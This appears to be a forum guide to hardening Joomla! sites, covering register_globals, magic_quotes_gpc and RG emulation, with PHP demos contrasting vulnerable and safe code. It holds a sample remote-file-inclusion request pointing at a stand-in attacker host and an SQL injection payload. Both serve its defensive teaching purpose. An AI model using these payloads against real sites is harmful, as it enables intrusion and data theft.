Register Globals
What does it do?
The PHP setting register_globals is a convenience for lazy developers. It takes every value that is passed to the script (GET, POST and cookie data) and turns it into a global variable without the script ever asking for it. This means that a request like
Code:
index.php?foo=bar
gives the script a variable $foo with the content "bar", exactly as if the script had assigned it itself.
Why is this bad? The culprit with this setting is that PHP does not check the value for anything harmful, and the script cannot tell whether a variable was set by its own code or by the visitor. So if I want to overwrite the path Joomla! uses to include files, I could just pass this to the script:
Code:
index.php?mos_config_livesite=http://bad.hacker.tld
The setting itself is not bad. If you initialise every variable yourself and check each value before using its content, you are practically safe and this feature only saves you some typing (as a developer). The problem is that a lot of developers deliver sloppy work and don't check all their variables. In Joomla! it is even simpler: for developers there is a function called mosGetParam() that does (almost) all the checking for you and is easy to use. If all developers used this function and did not rely on register_globals, we would have very few security problems.
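The problem described above in a few lines of PHP, as an added example written for this edit (it is not code from the original post or from Joomla!). register_globals itself was removed in PHP 5.4, so the script emulates it with extract(), which has the same effect: every request key becomes a variable. The variable name mos_config_livesite is the one used in the post; the request, page name and paths are made up for the demonstration.

```php
<?php
// Added example, not from the original post or Joomla!: a script that trusts
// a variable which register_globals lets the visitor set, next to one that
// reads its input explicitly. register_globals was removed in PHP 5.4, so
// extract() is used here to emulate it; the effect is the same, every request
// key becomes a variable. Variable and path names are assumptions.

// Constructed request, as if the browser had asked for
//   index.php?mos_config_livesite=http://bad.hacker.tld&page=about
$request = [
    'mos_config_livesite' => 'http://bad.hacker.tld',
    'page'                => 'about',
];

// Sloppy: assumes $mos_config_livesite was set by configuration.php. When
// this file is called directly that never happened, and with
// register_globals on the only value around is the attacker's.
function sloppy_include_path(array $request): string
{
    extract($request);                        // emulates register_globals = On
    return $mos_config_livesite . '/includes/' . $page . '.php';
}

// Hardened: configuration comes from the script itself, request data is read
// by name and validated against a whitelist before it is used in a path.
// (In Joomla! 1.0 mosGetParam() does the read-with-default part for you.)
function safe_include_path(array $request): string
{
    $mos_config_livesite = '/var/www/joomla';  // never from the request
    $page = $request['page'] ?? 'home';
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $page)) {
        $page = 'home';                        // reject anything but a plain name
    }
    return $mos_config_livesite . '/includes/' . $page . '.php';
}

echo "sloppy:   ", sloppy_include_path($request), "\n";  // built from the attacker's host
echo "hardened: ", safe_include_path($request), "\n";   // stays inside the web root
```

Run it from the command line with php to see the two paths side by side; the sloppy version ends up including a file from a host the attacker controls, the hardened one never lets request data decide where the include comes from.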
How can I turn register_globals off?
There are several ways to turn off register_globals. (On PHP 5.4 and newer the setting no longer exists and is always off; on older versions you have to turn it off yourself.)
Apache/PHP configuration files outside of your website's folder
If you have access to the configuration files of your server, put the following line into the server's php.ini and restart the web server:
Code:
register_globals = Off
.htaccess file
On most servers you can configure Apache with files named .htaccess. These files cannot be read from the web! Often you can't upload a file with that name directly, but you can upload it under another name and rename it to .htaccess on the server. To create this file, open a plain text editor such as Notepad or, on Linux, vi (NOT Word!!) and insert the line
Code:
php_flag register_globals off
Note that php_flag only works when PHP runs as an Apache module (mod_php). If PHP runs as CGI or FastCGI the directive is unknown to Apache and every request to that folder fails with a 500 error; in that case remove the line again and use the php.ini method below.
php.ini
When the .htaccess file does not work (typically because PHP runs as CGI or FastCGI rather than as an Apache module), you can try a php.ini file in your website's folder instead. It is almost the same, but the line has to be
Code:
register_globals = off
If none of these measures has any effect, contact your provider and ask them to turn it off for you.
If they refuse to do so, you should consider changing your hosting, since this is a basic security setting that has been around for years.
Magic Quotes
What does it do?
With magic_quotes_gpc on, PHP runs addslashes() over every value arriving via GET, POST and cookies, so single quotes, double quotes, backslashes and NUL bytes are escaped before the script sees them. This stops the most common quote-based SQL injection attempts against scripts that glue unchecked input straight into their database queries, which is why this option should be turned ON! Keep in mind that it is a blanket safety net for sloppy scripts, not a replacement for proper escaping or prepared statements in the script itself, and that the setting was deprecated in PHP 5.3 and removed in 5.4.
How can I turn magic_quotes_gpc on?
Basically it is the same as with register_globals, the only difference being the lines you put in. In .htaccess:
Code:
php_flag magic_quotes_gpc on
and in php.ini:
Code:
magic_quotes_gpc = on
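An added example, written for this edit rather than taken from the original post or from Joomla!: a small check script for the two PHP settings above (so you can verify that the .htaccess or php.ini change actually took effect on your host) combined with a demonstration of what magic_quotes_gpc does to input and why the script must still escape, or better, use prepared statements. It assumes you save it under any name in the web root, open it once in the browser, and delete it again; the users table and the inputs are constructed, and SQLite via PDO (pdo_sqlite extension) is used only because it needs no database server.

```php
<?php
// Added example, not code from the original post or from Joomla!.
// Part 1: report the state of the two settings discussed above.
// Part 2: show what magic_quotes_gpc does and what it does not protect.

function setting_state(string $directive): string
{
    $value = ini_get($directive);
    if ($value === false) {
        // Directive unknown to this PHP: 5.4 and later removed both settings.
        return 'not present in PHP ' . PHP_VERSION;
    }
    $on = in_array(strtolower((string) $value), ['1', 'on', 'true', 'yes'], true);
    return $on ? 'On' : 'Off';
}

echo 'register_globals: ', setting_state('register_globals'), "\n";   // should be Off
echo 'magic_quotes_gpc: ', setting_state('magic_quotes_gpc'), "\n";   // the post recommends On

// With magic_quotes_gpc on, PHP applies addslashes() to every GET, POST and
// COOKIE value before the script starts. Constructed input a visitor might
// type into a login form:
$typed = "admin' OR '1'='1";
echo "raw input:     $typed\n";
echo "magic-quoted:  ", addslashes($typed), "\n";

// Constructed table for the demonstration (SQLite in memory, no server).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (name TEXT)");
$db->exec("INSERT INTO users (name) VALUES ('admin'), ('bob')");

// Sloppy: the value is glued into the SQL text. The raw payload turns the
// WHERE clause into  name = 'admin' OR '1'='1'  and matches every row.
function count_by_name_concat(PDO $db, string $name): int
{
    $sql = "SELECT COUNT(*) FROM users WHERE name = '$name'";
    return (int) $db->query($sql)->fetchColumn();
}

// Correct: the value travels separately from the SQL text, so no escaping
// rule (MySQL backslashes, SQLite doubled quotes, ...) has to be guessed.
function count_by_name_prepared(PDO $db, string $name): int
{
    $stmt = $db->prepare("SELECT COUNT(*) FROM users WHERE name = ?");
    $stmt->execute([$name]);
    return (int) $stmt->fetchColumn();
}

echo "concat,   raw input: ", count_by_name_concat($db, $typed), " row(s)\n";
echo "prepared, raw input: ", count_by_name_prepared($db, $typed), " row(s)\n";

// addslashes() produces MySQL-style backslash escaping. SQLite does not
// understand backslash escapes, so pushing the magic-quoted string through
// count_by_name_concat() would raise a syntax error here rather than run a
// safe query: magic quotes only help the one database dialect they match.
```

The concatenated query counts every user because the quote in the input ends the string literal; the prepared statement counts none because the whole payload is compared as a name. That difference is the real fix; magic_quotes_gpc merely makes the sloppy version survive the most obvious payloads on MySQL.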
RG Emulation
What does it do?
RG Emulation is Joomla!'s own emulation of register_globals. It closes a lot of the security holes that come with the real register_globals and makes a lot of (sloppily coded) extensions work although register_globals is turned off. Unfortunately it does not close all of them, and therefore you should turn this feature off as well. An extension that stops working afterwards is one that relies on variables it never read explicitly and needs to be fixed, e.g. with mosGetParam().
How can I turn rg_emulation off?
Open the file globals.php in your Joomla! root folder, search for the following line:
Code:
define( 'RG_EMULATION', 1 );
and change the 1 to 0, then save the file.
Is my site now secure?
No. There are several more ways a hacker can gain entry to your server. These three settings just close the three biggest holes. Security in general is never complete, which means you can only make it as hard as possible for potential hackers to get into your site. To improve it further, always use the latest version of Joomla! and of all extensions you are using on your site. You should also subscribe to the announcement board of Joomla! by clicking the Notify button, and read the security forum.